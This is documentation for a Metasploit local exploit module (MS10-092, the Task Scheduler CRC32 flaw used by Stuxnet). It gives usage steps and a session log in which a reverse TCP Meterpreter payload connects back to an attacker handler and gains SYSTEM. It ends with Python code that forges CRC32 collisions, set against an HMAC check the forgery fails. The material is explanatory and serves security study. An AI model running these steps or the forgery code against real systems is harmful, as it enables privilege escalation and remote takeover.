## Vulnerable Application

This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet. When processing task files, the Windows Task Scheduler only uses a CRC32 checksum to validate that the file has not been tampered with. Also, in a default configuration, normal users can read and write the task files that they have created. By modifying the task file and creating a CRC32 collision, an attacker can execute arbitrary commands with SYSTEM privileges.

## Verification Steps

1. Start msfconsole
2. Get a Meterpreter session
3. Do: `use modules/exploits/windows/local/ms10_092_schelevator`
4. Do: `set SESSION `
5. Do: `run`

## Options

### TASKNAME

A name for the created task (default is random)

## Scenarios

### Windows Server 2008 SP1 (x64)

```
msf6 > use exploit/windows/local/ms10_092_schelevator
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms10_092_schelevator) > set session 1
session => 1
msf6 exploit(windows/local/ms10_092_schelevator) > run

[*] Started reverse TCP handler on 192.168.200.130:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Preparing payload at C:\Users\user\AppData\Local\Temp\QMGmEeEmFFq.exe
[*] Creating task: qThxbR37
[*] Reading the task file contents from C:\Windows\system32\tasks\qThxbR37...
[*] Original CRC32: 0xec6cfb1d
[*] Final CRC32: 0xec6cfb1d
[*] Writing our modified content back...
[*] Validating task: qThxbR37
[*] Disabling the task...
[*] SUCCESS: The parameters of scheduled task "qThxbR37" have been changed.
[*] Enabling the task...
[*] SUCCESS: The parameters of scheduled task "qThxbR37" have been changed.
[*] Executing the task...
[*] Sending stage (200774 bytes) to 192.168.200.218
[*] Meterpreter session 2 opened (192.168.200.130:4444 -> 192.168.200.218:52347) at 2022-08-19 00:53:17 -0400
[*] Deleting task pcT2p46d0...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-17B09RRRJTG
OS              : Windows 2008 (6.0 Build 6001, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : CORP
Logged On Users : 3
Meterpreter     : x64/windows
meterpreter >
```
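The root cause described under Vulnerable Application is that a CRC32 checksum is not an integrity check: CRC is linear, so any edited file can be brought back to the stored checksum by appending four chosen bytes, which is why the log above shows an "Original" and "Final" CRC32 that are identical. The following is an added illustration, not the module's own code; the task-file content, the `crc32_fixup`, `crc_check_passes` and `hmac_check_passes` helpers and the service key are all constructed for the example, and it contrasts the unkeyed check with a keyed HMAC that a user who can write the file cannot satisfy.

```python
import hashlib
import hmac
import zlib

# Reflected CRC-32 table with zlib's parameters (polynomial 0xEDB88320).
_TABLE = []
for i in range(256):
    c = i
    for _ in range(8):
        c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
    _TABLE.append(c)
# Every table entry has a distinct top byte, so the top byte identifies it.
_BY_TOP = {t >> 24: i for i, t in enumerate(_TABLE)}


def crc32_fixup(data: bytes, target: int) -> bytes:
    """Return 4 bytes p such that zlib.crc32(data + p) == target."""
    reg = zlib.crc32(data) ^ 0xFFFFFFFF   # internal register after `data`
    want = target ^ 0xFFFFFFFF            # register we need at the end
    idxs, state = [], want
    for _ in range(4):                    # backwards: which table entries
        idx = _BY_TOP[state >> 24]        # must be hit by the 4 new bytes
        idxs.append(idx)
        state = ((state ^ _TABLE[idx]) << 8) & 0xFFFFFFFF
    patch = bytearray()
    for idx in reversed(idxs):            # forwards: bytes that hit them
        patch.append((reg ^ idx) & 0xFF)
        reg = _TABLE[idx] ^ (reg >> 8)
    assert reg == want
    return bytes(patch)


def crc_check_passes(stored: bytes, candidate: bytes) -> bool:
    """The weak check: an unkeyed checksum anyone can recompute."""
    return zlib.crc32(candidate) == zlib.crc32(stored)


def hmac_check_passes(key: bytes, stored: bytes, candidate: bytes) -> bool:
    """The keyed check: only satisfiable by a party holding the key."""
    mac = lambda m: hmac.new(key, m, hashlib.sha256).digest()
    return hmac.compare_digest(mac(candidate), mac(stored))


def demo() -> tuple:
    """Constructed stand-in for a task file; returns (crc ok, hmac ok)."""
    stored = b"<Task><Exec>original.exe</Exec></Task>"
    edited = b"<Task><Exec>modified.exe</Exec></Task>"
    forged = edited + crc32_fixup(edited, zlib.crc32(stored))
    key = b"constructed-key-held-only-by-the-service"  # hypothetical
    return crc_check_passes(stored, forged), hmac_check_passes(key, stored, forged)
```

`demo()` returns `(True, False)`: the edited file passes the CRC32 comparison but not the HMAC comparison.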